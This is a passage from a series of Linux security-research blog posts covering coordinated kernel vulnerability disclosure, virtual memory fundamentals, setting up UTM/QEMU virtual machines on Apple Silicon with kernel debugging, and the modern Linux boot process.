At the end of the embargo period the patch is committed upstream, oss-security@lists.openwall.com is notified, CVE descriptions are made public, tweets are made etc.
If proof-of-concept code is to be published, this is ideally done several days after to give people time to patch their kernels / apply updates

0x01 First Contact

Alright, finally! We’ve got all the details covered, now we just need to send an email to security@kernel.org and linux-distros@vs.openwall.org right? WRONG!

Well, technically right, but there’s a few crucial details we need to make sure of first, unless you want to stumble your way onto the scene like yours truly.

I’ve linked each of the relevant emails to their respective pages, which outline mailing list usage and any requirements. There’s a lot of information and sometimes it’s conflicting, as “linux kernel vuln” disclosure is only a subset of what these lists are used for.

❗

Going forward I may refer to the lists by shorthand as s@k.o and linux-distros.

So to cut short a long and embarrassing saga of trial and error on my part, here’s a distilled collection of the relevant requirements and advice learned:

Initial disclosure should be sent to linux-distros, CC’ing s@k.o along with any relevant subsystem maintainers[1]
The email should be sent in plaintext; referring here to the email type and not just the fact it’s not encrypted (e.g. as opposed to RTF emails with fancy HTML and stuff)
The subject should be prefixed with [vs] to avoid linux-distro’s spam filter, and the subject shouldn’t contain any sensitive information RE the vulnerability
Propose a tentative public disclosure date & time (e.g. 05/02/22 16:00GMT), while ideally a date should be settled on after a fix is decided, note the maximum embargo period for linux-distros is 14 days regardless of a working fix
Include a request for a CVE to be assigned for the vulnerability
As mentioned, provide as much information and detail as necessary (no War & Peace tho); if you have a fix, see the next section on how to format/include that correctly

With all that in hand, you should be ready to make first contact and begin the coordinated disclosure of your Linux kernel vulnerability, awesome!

I was about to write my own War & Peace on mail clients, but suffice to say the kernel docs provide some helpful information on recommended email clients and any necessary configuration required to get them to play nice.[2]

0x02 Patching & Follow Up

Did I CC the right maintainers?! Did my tabs come through on my patch?? Is this even the right mailing list???? - don’t sweat it, the waiting game can be real.

If you don’t hear back within 48 hours then make sure to follow up the initial email to confirm that it was received, as sometimes things can get lost in the mix.

The discussion that ensues will vary based on the amount of information initially supplied, but will likely focus around impact, mitigations and sorting out a fix.

Including a Patch

“Submitting patches: the essential guide to getting your code into the kernel” is going to be your best friend here, covering almost everything you need to know.

The only difference is you’ll just be including this inline within your disclosure email thread with s@k.o and linux-distros; as opposed to a separate submission.

This is where the whole email client whitespace mangling comes in to play, as the Linux kernel uses tabs for indentation and these should really be preserved in patch diffs.

Also, I’m sure it goes without saying, but make sure you test any patches you submit and make this clear when you suggest a patch!

0x03 Public Disclosure

The finishing line is in site now, you can almost see the retweets, as the embargo period comes to an end. There’s not much to cover here, so I’ll keep it brief:

Hopefully a patch has been finalised and the upstream fix can now be disclosed
You can request linux-distros to make the CVE details public
You should send an advisory out to oss-security@lists.openwall.com; see their wiki for more info, but content will be similar to your initial report to linux-distros[1]
If you plan to publish exploit code, mention this in the initial public advisory, but ideally wait several days for users to update their systems

And that’s it! It’s over! Now you can go back to the easy part and find some more vulns!

Here are some examples of public advisories from Qualys & grsec

Wrapping Up

Hopefully this post has given some insight into a particularly niche subset of coordinated disclosure practice and can provide some help to people who find themselves into a similar position as I did recently!

Admittedly, the process was rather daunting to go into with the self-imposed pressure of wanting to disclose a new vulnerability, complete inexperience with mailing lists and figuring out the relevant processes and requirements which applied to my situation.

That said, it was also extremely rewarding to be able to contribute back to the Linux community and be able to facilitate a fix for something like this. There may have been more than a little bit of fan-boying while interacting with people I’ve followed for a long time, even if they were schooling me on mailing list 101s.

Despite fumbling my way through the process, everyone was helpful and patient, though maybe with this post you can avoid some of the same fumbling.

exit(0);

Linternals: Introducing Virtual Memory

sam4k — Sat, 15 Jan 2022 21:00:00 +0000

Alright, let’s get stuck into some Linternals! As the title suggests, this post will be exploring the ins and outs of virtual memory with regards to modern Linux systems.

I say Linux systems, but this topic, like many in this series, treads the line between examining the Linux kernel and the hardware it runs on, but who cares, it’s still interesting right? And I guess it is one of the fundamental building blocks of modern systems too…

That said, I’ll try abstract away from getting too stuck into the knitty gritty of hardware specifics where possible (no promises though!), so forgive any gross over simplifications for what can be a deceptively complex topic.

In this part I’ll lay the groundwork by covering some fundamentals such as the differences between physical and virtual memory, the virtual address space and how user-mode and the kernel interact with it this virtual address space.

In a later part (or parts, given my track record), we’ll dive a bit deeper and look into how this is implemented and the ways we can really take advantage of virtual memory.

0x01 What IS Virtual Memory?
- Physical Memory
- Queue Virtual Memory
0x02 The Virtual Address Space
- Let’s Touch on Addressing & Hexadecimal
- That’s a Big VAS
- VAS Overview
  - Advantages of Virtual Memory
0x03 The VM Split
Next Time!

0x01 What IS Virtual Memory?

Virtual memory, every compsci student knows what virtual memory is right, it’s uh, virtual memory, you know, memory that’s not physical? Yeah, I’m realising it can be a bit fiddly to describe virtual memory in a succinct and intuitive way.

Physical Memory

Let’s start with what virtual memory ISN’Tish, and that’s physical! The term “physical memory” typically refers to your system’s RAM (random-access memory). This is the volatile memory your operating system uses for all things transient.

While having your memory cleared when your system is powered-off[1] may seem inconvenient, RAM’s speed makes it ideal for use-cases where volatility doesn’t matter.

Keeping this brief, there’s actually a lot of use-cases for RAM. Like, a lot. The software you’re using to view this post? Loaded into and running in RAM. The operating system running that software? Loaded into and running in RAM.

Often we say how a program is “loaded into memory” and yes, you guessed it, this ubiquitous “memory” and RAM AKA physical memory are all one-and-the-same. We use non-volatile storage such as SSDs and HDDs to store our kernel, binaries, configs and stuff and then when we need to use them, they’re loaded into the much faster RAM for use.

You may also hear RAM referred to as primary memory and SSDs & HDDs as secondary memory.

Unless… here’s a paper from 2008 USENIX Security Composium about recovering data from RAM

Queue Virtual Memory

Okay, so now we have a general grasp of physical memory and the integral role it plays, it’s time to introduce the titular virtual memory!

As we alluded to above, basically everything wants a piece of RAM. Using ps we can see just how many processes are vying for a slice of our precious RAM:

$ ps -e --no-headers | wc -l
404

And if anyone has ever looked into building or upgrading a PC, they’ll know that GB for GB, RAM is a lot more expensive than it’s non-volatile counterparts.

Not to mention, as the “random-access” implies, systems are able to access any memory location in physical memory directly, meaning things can get chaotic real fast if every process is trying to find and manage which bits of memory are up for grabs.

Queue virtual memory: a means to abstract processes away from the low level organisation of physical memory (this burden is passed to the kernel) by providing a Virtual Address Space.

0x02 The Virtual Address Space

Sweet, so the Virtual Address Space (VAS) provides a physical memory abstraction for processes to use by shifting the burden of managing low level organisation to the kernel! Cool cool … so, uh, how exactly?

Instead of having processes (and by extension their programmers) deal with accessing and managing physical memory directly, using virtual memory provides each process with it’s own virtual address space.

This virtual address space represents the range of all addressable physical memory. Let’s unpack that for a second. Not all free RAM, or even all the RAM you have installed in your computer, but all the possible physical memory your computer could address if it had it.

Modern 64-bit systems can handle 64 bits of data at a time. This means on typical 64-bit architectures, like Intel’s x86_64 and aarch64, pointers to memory can be 64-bits long. So, theoretically speaking, we can have up to 264 different addresses[1].

This means our virtual address space on a 64-bit system ranges from 0x0 - 0xffffffffffffffff. That’s a lot of bytes!

For anyone wondering on this value, a “bit” is a binary value, it can be a 0 or 1. So 64 of them can represent a combination of 264 different values

Let’s Touch on Addressing & Hexadecimal

Some of you will notice that I wrote the address in hexadecimal (hex), which is a base 16 number system; tl;dr being the numbers go up to 16 instead 10 before becoming 2 digits.

We use hexadecimal over decimal because as a base 16 system, it lines up perfectly with the binary (base 2) system that forms the fundamental of computing architecture and as a result all manner of digital data representation.

The reason hexadecimal “lines up perfectly” is that 16 is a power 2; 24 specifically, which basically means that 1 hex digit can perfectly represent any 4 binary digits. 2 hex for 8 binary and so on. Whereas decimal simply doesn’t align like this.

So for things like memory, which is often byte-addressable, hexadecimal provides as a more readable and information dense alternative to using binary.

That’s a Big VAS

Back to the VAS, some of you might have clocked that 0xffffffffffffffff is an awful lot of bytes, right? Yep, unless you have 264 bytes AKA ~18 Exabytes AKA 18874368 Terabytes, then we’re clearly addressing far more memory we have on our primary and secondary memory combined! And for each process?! What gives?

First and foremost, remember, this is a virtual address space provided to processes. The reality is the majority of this address space will go unused. For virtual memory to actually be used, and take up space, the virtual address has to be mapped to some physical address.

Mapped?? For virtual memory to be used by a process it first needs to be mapped to a physical address, where the data actually resides. It’s the kernels job to handle this and manage the book keeping for memory management.

At one point or another, the virtual memory address needs to be translated to the physical address where the data is actually located, this process is called address translation.You bet we’ll be looking into that some more later!

But let’s use this moment to remind ourselves that each process has it’s own virtual address space. So effectively, each process lives in a sandbox, believing it has unfettered access to addresses 0x0 - 0xffffffffffffffff. Processes are not aware/able to access the virtual address space of another process.

Drastically over simplified view of how two processes can use the same virtual address which however translates to a different physical address.

So this means that process 1 & process 2 could make use of the same virtual address in their respective virtual address space, however these would both be translated by the kernel to two DIFFERENT physical addresses. Still following?

VAS Overview

So to summarise what we’ve learned so far: each process running on a Linux system has it’s own virtual address space. This VAS can span the entire addressable space for that architecture, however virtual addresses are only used after they have been mapped by the kernel to a physical address i.e they are actually taking up some space in physical memory.

It’s the kernels role to do all the bookkeeping and lower-level memory organisation around translating this virtual address to the actual physical address1.

This way, processes and their programmers don’t need to concern themselves with any low-level memory organisation or even worry about other processes, they just have to interact with this broad VAS and the kernel will handle the rest.

Advantages of Virtual Memory

Given the above, one of the most obvious advantages of virtual memory is that it takes a lot of the burden off of programmers with regards to memory management.

However, as we’ll touch on more later, using a virtual memory scheme affords us several other important advantages as well:

It allows the kernel, behind the scenes, to actual map virtual addresses to secondary memory (SSDs & HDDs). This allows us to map less used/important2 data to the slower secondary memory and free up our scarce RAM for data that needs it.
The address translation process and abstraction of physical memory allows us to implement additional features, notably security related ones, to our memory management

I say “around translating” as technically the actual address translation is done at a lower level, by the CPU
Another gross simplification, we might touch later on the metrics behind these decisions

0x03 The VM Split

Okay, let’s explore a little more how the virtual address space is used in Linux, as it’s not just a matter of throwing a 18EB address space at a user process and saying have at it!

About Processes

I realised I’m throwing around the term process left and right, and while I want to remain focused on the topic at hand, I’ll just touch briefly on what a process is in Linux.

Simply, a process is a running instance of a program[1]. Nowadays, programs can get pretty complex and thanks to the advances of programming languages and library support, the burden of reaching these complexity needs are eased.

However, even the most simple “Hello, World!” program in C requires loading shared libraries which in turn need to interact with the kernel to get things done.

Don’t believe me? Take the basic C program below:

#include 
int main() {
   printf("Hello, World!\n");
   return 0;
}

With a few commands, we can get a quick insight into what’s going on behind the scenes:

$ ldd hw
        linux-vdso.so.1 (0x00007ffecb53e000)
        libc.so.6 => /usr/lib/libc.so.6 (0x00007fc3747f3000)
        /lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fc3749f3000)

ldd prints the shared objects (shared libraries) dependencies required by our dynamically compiled hw.c, in our context, this means when we map our program into it’s virtual address space, we’ve also got to map any necessary dependencies too.

$ strace ./hw
execve("./hw", ["./hw"], 0x7ffd3ee6c190 /* 62 vars */) = 0
brk(NULL)                               = 0x563a56b24000
arch_prctl(0x3001 /* ARCH_??? */, 0x7fff70afecc0) = -1 EINVAL (Invalid argument)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=180840, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 180840, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f9ab51e1000
close(3)                                = 0
openat(AT_FDCWD, "/usr/lib/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0`|\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0@\0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0"..., 80, 848) = 80
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0K@g7\5w\10\300\344\306B4Zp..., 68, 928) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=2150424, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9ab51df000
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1880536, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f9ab5013000
mmap(0x7f9ab5039000, 1355776, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7f9ab5039000
mmap(0x7f9ab5184000, 311296, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x171000) = 0x7f9ab5184000
mmap(0x7f9ab51d0000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1bc000) = 0x7f9ab51d0000
mmap(0x7f9ab51d6000, 33240, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f9ab51d6000
close(3)                                = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9ab5011000
arch_prctl(ARCH_SET_FS, 0x7f9ab51e0580) = 0
mprotect(0x7f9ab51d0000, 12288, PROT_READ) = 0
mprotect(0x563a56a14000, 4096, PROT_READ) = 0
mprotect(0x7f9ab523c000, 8192, PROT_READ) = 0
munmap(0x7f9ab51e1000, 180840)          = 0
newfstatat(1, "", {st_mode=S_IFCHR|0600, st_rdev=makedev(0x88, 0x1), ...}, AT_EMPTY_PATH) = 0
brk(NULL)                               = 0x563a56b24000
brk(0x563a56b45000)                     = 0x563a56b45000
write(1, "Hello, World!\n", 14Hello, World!
)         = 14
exit_group(0)                           = ?
+++ exited with 0 +++

strace allows us to trace system calls and signals. System calls are (as we can learn via man syscalls[1] the fundamental interface between an application and the Linux kernel.

So as we can see, there’s an awful lot going on under the hood of our little “Hello, World!” program - it isn’t until write at the bottom we see our actual write syscall to write our string "Hello, World!" to stdout (aka the console)!

That’s because the majority of that is setting up the virtual address space for our program. It might not all make sense now, but we can see our dependencies from ldd being setup as well as various memory related syscalls including brk, mmap, mprotect and munmap.

In Linux world, basically everything is considered a process or a file, so even multiple threads of the same running program are all viewed as separate processes
The second section of man, man 2, is for syscall manuals. So if you want to read more about read above for example, you can use man 2 read for the syscall’s man page

User-mode & Kernel-mode

So as we just saw, for a program to even be loaded into memory and run as a process, there’s an awful lot of interaction that needs to go on with the kernel.

We established that syscalls act as an interface between an application and the Linux kernel, meaning that on the other end of that syscall there’s some kernel code running.

Let’s pause a moment and quickly touch on why syscalls are even a thing. Why not just have the process do the systemy thing it needs to do directly? Like in a standard library?

The reason is due to privilege levels. The tl;dr on this is that our hardware let’s us select several different privilege levels, and in Linux we make use of two of these. So at any given time we are running in user-mode or kernel-mode.

As a result we also have the terms user-space and kernel-space. Typically stuff in user-space is running in user-mode and stuff in kernel-space run in kernel-mode.

The kernel resides firmly in kernel-space and as such can only be run in kernel-mode and the only way for a user-space process to change the privilege level is via a syscall.

So, syscalls act as gatekeepers of sorts, allowing user-space processes to get the kernel to carry out specific, privileged actions on its behalf, without giving away the keys to the kingdom.

Queue The VM Split!

So to sum up what we know so far:

Each process has its own, sandboxed, virtual address space
Each process needs to run kernel code to setup its VAS, done via syscalls

This begs the question, after we call our syscall and transfer to kernel-mode, we’re still running within the same process context, so how do we know where the kernel code is?

We map the kernel into the VAS, that’s how! Almost like a shared library, the kernel is also mapped into the VAS, I mean we have enough space right?

There’s an overhead to switching the CPU’s context (tl;dr there’s context specific registers that get swapped in and out when we want to run in a different context, e.g. run another process), so to avoid this the kernel is mapped into the same VAS as the process.

This is all implemented by splitting the virtual memory into two sections, the User Virtual Address Space and the Kernel Virtual Address Space:

x86_64 VM split

On x86_64 Linux systems, we can see the lower 128TB of memory is assigned to the user virtual address space and the upper 128TB is assigned to the kernel virtual address space.The rest? Well that’s just an unused, no man’s land bridging the gap between the two.

In fact, on typical x86_64 setups today only 48 bits of the virtual address are actually used; the most significant 16 bits (MSB 16) are always set to 0 for the User VAS and 1 for the Kernel VAS. Makes it convenient for spotting what kind of address you’re looking at in a debugger!

The exact proportions of the VM split and details like how many bits are used for addressing are architecture & config specific.

Next Time!

Today we laid the groundwork for our journey to understanding virtual memory on modern Linux systems. We briefly covered what we mean when we talk about physical vs virtual memory, followed by an understanding of the virtual address space itself.

Now that we understand how (and at a high level why) the virtual address space is split up into the two sections - the User VAS & Kernel VAS - next time we can delve deeper into each of these sections.

Furthermore, I want us to get a closer look at the lower level details on what’s going on behind the scene in the kernel in regards to memory management as well as touching on the role the hardware plays in enabling this.

And likely much, much more - so stay tuned!

exit(0);

Setting Up A Virtualised (Linux) Empire on Apple Silicon

sam4k — Sat, 08 Jan 2022 19:07:10 +0000

I recently started an awesome new role as a Sr. Security Researcher (yay me) and as a work from home position this came with the perk of picking some shiny new work kit; with the two main contenders being a new Dell Precision or a MacBook Pro.

In my infinite wisdom (read: hubris), of course I opted for the new MacBook Pro - after all, with all the headlines and buzz, I wanted to see what this M1 fuss was all about!

The panic started to set in, had I made a horrific decision? In getting caught up in the hype and excitement I’d forgotten the implications of switching my workflow to a completely different architecture, and one as new as Apple’s Silicon.

However, after some time researching, tweaking and debugging I’m now in a position where I can happily say I have no regrets moving to Apple Silicon and in fact am beginning to see what the hype is all about! Of course, this isn’t to say the grass really is perfectly green on the other side, there are still issues, particularly due to it’s infancy, but more on that soon!

So without further ado, below is the culmination of moments of bewilderment, exasperation and elation as I transitioned my workflow as a Linux security researcher from Linux x86_64 to MacOS aarch64.

My Virtualised Empire
Virtualisation Options on M1
UTM: A Whistle-stop Tour
- Aarch64 Guests
- x86_64 Guests
  - Performance
  - Weirdness
- Networking
- Kernel Debugging with GDB
  - Host-Guest
  - Guest-Guest
  - Also, No GDB on HVF
- Resizing Disks
Conclusion

My Virtualised Empire

So, turns out the title might have been a little clickbaity, as my virtual empire is more of a virtual hamlet. Before I take any more of your time, take a look at the diagram below:

This is the general gist of what I set out to, and outline how to, achieve in this post. As a security researcher and Linux enthusiast there we a couple of important factors:

I want a ‘dev’ guest that would run Linux and be my main development workhorse; this is where I’d be spending a lot of time so performance is key
I need to be able to spin up a variety of ‘research’ guests; likely short lived and many so ease of setup is important
Speaking of variety, I need to be able to spin up guests running on difference architectures, specifically aarch64 (native) and x86_64 (emulated)
Finally, I break things … often. So debugging is important too! While not strictly relevant to the overarching topic of virtualisation, I’ll touch on this briefly

And, well, that’s about it! If this sounds of any interest to you, feel free to continue reading as I outline how I achieved this setup, the thought process behind some of my choices and likely most relevant are some of the gotchas I encountered along the way.

Virtualisation Options on M1

Before receiving my MacBook Pro, I primarily worked in Linux environments and my virtualisation software of choice was VMWare Workstation. Moving to MacOS, I wasn’t sure what the virtualisation ecosystem was like.

Unsurprisingly VMWare was still a big name, with their MacOS software hypervisor Fusion being popular. However, it wasn’t the only contender. Parallels is also another popular choice for virtualisation on MacOS. Slightly less in the limelight were VirtualBox and QEMU-based UTM.

I won’t bore you with a breakdown of the various features, pros and cons for each of these products because in the end it was an extremely simple decision. Mainly due to the fact that UTM is the only one (at the time of writing) that meets all my criteria above.

As far as I know, VMWare and Parallels have no plans to support x86_64 emulation on M1’s and VirtualBox doesn’t have any kind of M1 support yet. See? Easy!

UTM: A Whistle-stop Tour

UTM is another virtualisation software built specifically for Apple products. What’s really neat about UTM for my criteria is that it’s built on top of QEMU. For those that haven’t heard of it, QEMU is a free and open-source hypervisor. In particular:

UTM can use Apple’s hypervisor framework[1] to virtualise aarch64 guests at near native speeds, which is great for my dev box!
Furthermore, UTM provides the option to use QEMU’s Tiny Code Generator (TCG)[2] which allows us to emulate different architectures (at a significant performance cost)
For those that have used QEMU in the past, UTM provides an amazingly simplified yet flexible front-end for the deluge of different parameters QEMU can take
By using QEMU, we have access to the gdbstub QEMU employs for kernel-level debugging (with caveats below)

For people reading this near time of publication, I heartily recommend using the UTM 3.0.0 (beta) release which can be found here. It adds some important features, as well as some neat quality of life improvements.

Aarch64 Guests

Okay, let’s start off with the simplest setup. If you have no architecture requirements, you definitely want to run an aarch64 guest to match your M1 host’s architecture. This allows you to make full use of Apple’s hypervisor framework and get the best performance.

In terms of guest OS, you’ll need to make sure you’re running an arm64/aarch64 build! Unfortunately the demand is still scaling up for these, so you may find your favourite distro might not have support for this. I made do with Ubuntu 22.04 Jammy, as they have a aarch64 desktop build handy[1]. For Arch users, there’s also ArchLinux ARM.

For setup, it’s really as simple as following the UTM setup wizard[2]. The main thing to remember is that we want to choose “Virtualise” as we don’t need to emulate another architecture. Other than that, it’s all fairly straightforward. No tweaks needed!

https://cdimage.ubuntu.com/daily-live/current/
Requires UTM 3.0.0+

x86_64 Guests

Moving on, now we’ve got our dev guest up, what if we want to do some x86_64 activities? Again, using the UTM wizard we’ll want to this time select “emulation” and proceed with the rest of the wizard, so far so good!

Now for the bad news, in order to emulate another architecture we need to use TCG, QEMU’s Tiny Code Generator. Unsurprisingly emulating a completely different CPU architecture is a lot slower than using the native hypervisor we were able to previously.

Performance

To mitigate the impact of this, there’s a few things we can do:

Avoid GUIs where possible! That’s right, pick up a server edition or something
If you must, be stingy on resolution where possible; in the VM settings -> "Display", consider the graphics type and disabling retina mode
Go into VM settings -> "System" -> "Show Advanced Settings" and make sure to up the cores if possible and check “Force Multicore”; on x86_64 at least this is seen to have marked improvements on perf
In the same section as above, I’d also recommend the qemu64 CPU for best compatibility results unless you have specific requirements

Weirdness

Again, unsurprisingly, weird things can crop up when running a fully-fledged Linux operating system on an emulated architecture, and I mean WEIRD. Programs not working? System errors popping up? Kernel panics?

This could be a result of missing “CPU Flags”, under the VM settings -> "System" -> "Show Advanced Settings". Yep, there’s a lot. Over the years these have accumulated and you might find that some x86_64 instructions that are being run in your guest might require specific flags to be enabled.

I had a situation where some software running and then instantly crashing. Some digging later and it turned out it’s kernel driver was failing to load due to a SIGILL, which turned out to be a specific instruction in a crypt library it was using. It was a matter of googling cpu flag and I was able to find the culprit.

Networking

After years spinning up my own shoddy initramfs based QEMU VMs through bash scripts, I learned to stay clear of any kind of networking. It just never panned out. Luckily, I can say the absolute opposite for UTM. For me, it just worked.

All of my VMs are configured with the “Shared Network” network mode, in the VM settings -> "Network", with the virtio-net-pci card. With this setup, each of your guests can access the internet like a classic NAT setup, with the added bonus of a bridge on the host which will allow all your guests (and host) to communicate to one another.

Kernel Debugging with GDB

The process of setting this empire up, let alone my job, required being able to do some kernel debugging on my guests. Like other virtualisation software, QEMU provides a gdbstub which will act as a gdb server on your guest, allowing you to connect remotely and debug the guests kernel - it’s pretty neat

https://qemu.readthedocs.io/en/latest/system/gdb.html

Host-Guest

It uses the exact same arguments as QEMU, if you’re familiar with that, so we just need add the -s[1] argument to our guest and it’ll set up the gdbstub on your GUEST to listen on localhost:1234 on your HOST.

To do this we go to VM settings -> "QEMU". This section will show you how your configuration and settings translate into QEMU arguments. If we scroll to the bottom there’s an input labelled “New” where we can add our own. Pop in -s and we’re good!

Now, if we open the terminal on our MacOS host and start gdb w- just kidding, gdb doesn’t have a build available for M1’s at the time of writing. But you CAN use lldb to connect to the remote server currently listening on localhost:1234 if you’re so inclined, otherwise…

QEMU users might be used to -s -S, where the -S will tell QEMU to not start the guest until you tell it to via gdb; this is already in use by UTM as far as I can tell, so we just make do without

Guest-Guest

Ew, lldb right?! If you want to be able to debug a guest from another guest, in my case I want to be able to use gdb on my dev guest to debug one of my research targets.

Fortunately, it’s not much work. As I mentioned above, the QEMU -s setups a gdbstub to listen on localhost:1234. This is because it’s an alias for the command -gdb tcp:localhost:1234. So all we need to do is change localhost to the bridge interface our host uses to communicate with the guests.

ipconfig -a on your MacOS terminal will show you all your interfaces and you should see bridge100 or similar with an IP address ending in .1 that matches your guest LAN. For me this is 192.168.64.1; my guests can reach my MacOS host via this IP. So this is where we’ll set up our gdbstub to listen, like so:

Now from my dev VM I’ll be able to access the listener, allowing me to debug any other guests on the shared network, neat! I can do this in gdb with the following command:

(gdb) target remote 192.168.64.1:1234

Also, No GDB on HVF

Remember I said something about the grass not being so green? Well, hvf (QEMU’s accelerator that uses Apple’s hypverisor framework) doesn’t support breakpoints (hardware or otherwise) via the gdbstub as of the time of writing (version 6.2.0 is used by UTM currently).

This means that whenever you want to debug (with breakpoints) a guest, regardless of the architecture, you need to make sure you go into "VM settings -> "QEMU" and uncheck "Use Hypervisor". Yep, it’s going to be slower, but it won’t be forever.

Resizing Disks

Something that might come in handy for some is knowing how to resize your guests’ disks, without having to attach a new one and go through that whole rigamarole.

For this you’ll need to use QEMU in the terminal and I couldn’t immediately find any binaries UTM might be using in their package, so I installed it via Brew, using brew install qemu - fairly straightforward.

The command qemu-img resize ~/Library/Containers/com.utmapp.UTM/Data/Documents/.utm/Images/disk-0.qcow2 +10G will allow you to extend your VMs disk by 10GB.
- Make sure you choose the right VM folder and disk!
Depending on your guest OS, you’ll likely need to do some additional tinkering to get the system to use the additional space, typically by extending the partition or logical volume
- E.g. for extending LVM, you can follow this guide

Conclusion

And that’s pretty much it! As you can see it’s not a particularly hands-on process, it just takes a bit of research and knowing what to use and what workarounds to take. If there’s any additional gotchas or tips I stumble upon, I’ll add them to this post.

I’ve no doubt the ecosystem and support for Apple silicon will only improve and honestly I’ve been impressed by the speed the open-source community has adopted it.

exit(0);

Linternals: The (Modern) Boot Process [0x02]

sam4k — Sun, 10 Oct 2021 14:13:00 +0000

Welcome to the second part of my totally-wasn’t-meant-to-be-a-one-part Linux internals post on the modern boot process! Last time I set the scene and covered the GUID Partition Table (GPT) scheme for formatting your storage device; briefly touched on what happens when you power on your computer and what happens when it hands over control to UEFI.

So without anymore rambling and rehashing, let’s jump right back into the action. UEFI has just consulted the EFI variables in NVRAM to determine boot order, locate the first available bootloader on the list and will now transfer control over to it …

0x03 Optional Bootloader
- Wait This Is Optional?
0x04 The Kernel (Setup)
- Getting to Main
- The First C
- And Back To Assembly
- Decompression Time!
  - First Some Background
  - Back To Decompression
Next Time

0x03 Optional Bootloader

There’s a number of different bootloaders out there that you can use with your Linux system, each with their own pros and cons, but at their core they’ll all need to meet the requirements laid out by the Linux Boot Protocol[1].

For reference, any specifics in this section will be referring to the common GNU GRUB 2 bootloader. It’s worth noting that while we’re operating within a Linux context, GRUB 2 and other bootloaders are capable of booting a variety of systems, not just Linux.

In days gone this was a multi-stage process due to the size constraints of the old BIOS+MBR system, however nowadays the entire bootloader can be stored in the ESP and UEFI can hand control straight over. In the case of GRUB 2, this is grub_main(void) over in grub-core/kern/main.c, so feel free to follow along.

First things first there’s going to be some architecture-specific machine initialisation, like setting up the console; some rudimentary memory management; locating and loading dependencies/addons (e.g. GRUB modules); loading any configs etc.

With initialisation handled, the bootloader is in a position to be able to do it’s job. Typically modern bootloaders like GRUB will provide an interactive menu to the user, with varying degrees of features. Invariably, however, should be the option to boot one or more kernels/operating systems.

As a quick aside, in GRUB this post-initialisation mode is called “normal mode” and we can see this in a call to grub_load_normal_mode() at the end of grub_main(), and yes keen-eyed and battle-scarred GRUB users might notice a call to grub_rescue_run () just under that. So, if normal mode falls through, we end up at the dreaded grub rescue >…

Anyway, back to generic bootloader things, when we select our kernel (or more likely let the timer tick down and select the default option) - which is of course a Linux one, right?! - we begin the “Linux Boot Protocol” as outlined above[1] to get our chosen kernel up and running.

The short and sweet of this is that the bootloader will bootstrap the kernel by loading into memory the “kernel real-mode code”, consisting of the kernel setup and kernel boot sector, creating a memory mapping similar to the one seen below:

        ~                        ~
        |  Protected-mode kernel |
100000  +------------------------+
        |  I/O memory hole       |
0A0000  +------------------------+
        |  Reserved for BIOS     | Leave as much as possible unused
        ~                        ~
        |  Command line          | (Can also be below the X+10000 mark)
X+10000 +------------------------+
        |  Stack/heap            | For use by the kernel real-mode code.
X+08000 +------------------------+
        |  Kernel setup          | The kernel real-mode code.
        |  Kernel boot sector    | The kernel legacy boot sector.
X       +------------------------+
        |  Boot loader           | <- Boot sector entry point 0000:7C00
001000  +------------------------+
        |  Reserved for MBR/BIOS |
000800  +------------------------+
        |  Typically used by MBR |
000600  +------------------------+
        |  BIOS use only         |
000000  +------------------------+

... where the address X is as low as the design of the boot loader permits.

Without going down the rabbit hole, the tl;dr on “real-mode” is that modern processors have several “processor modes” (legacy modes, long mode). These control how the processor sees and manages the system memory and the tasks that use it. For legacy reasons, processors boot into real-mode and this is the mode we have been running in so far [3].

One of the limits of the “legacy” real-mode is a limit of 1MB addressable RAM. Yep. Old school right? So that explains why the memory map above only goes to 100000 and why the area beyond it is labelled “Protected-mode kernel”, neat!

Back to the kernel real-mode code we’ve loaded into memory for the kernel setup. Once loaded into memory, the bootloader will read and set fields from the kernel setup header, which can be found at a fixed offset from the start of the setup code[4].

This header helps define the information necessary for the bootloader to hand over control directly to the kernel setup code.

Wait This Is Optional?

The keen-eyed of you will be wondering why the section was titled “Optional Bootloader” - after all that all seemed kinda crucial right? Well, harnessing the flexibility and power of UEFI over Legacy BIOS, “the Linux kernel supports EFISTUB booting which allows EFI firmware to load the kernel as an EFI executable”[5].

However, bear in mind that there are tradeoffs between using EFISTUB and the more feature-rich bootloaders-of-old like GRUB 2.

For x86, we can find this in [linux/documentation/ARCH/boot[ing].rst](https://github.com/torvalds/linux/blob/master/Documentation/x86/boot.rst)
See grub_main(void) over in grub-core/kern/main.c, first thing we call is arch specific grub_machine_init().
https://en.wikipedia.org/wiki/X86-64#Operating_modes
For x86 we can see this action over in [/arch/x86/boot/header.S](https://github.com/torvalds/linux/blob/0adb32858b0bddf4ada5f364a84ed60b196dbcda/arch/x86/boot/header.S#L297)
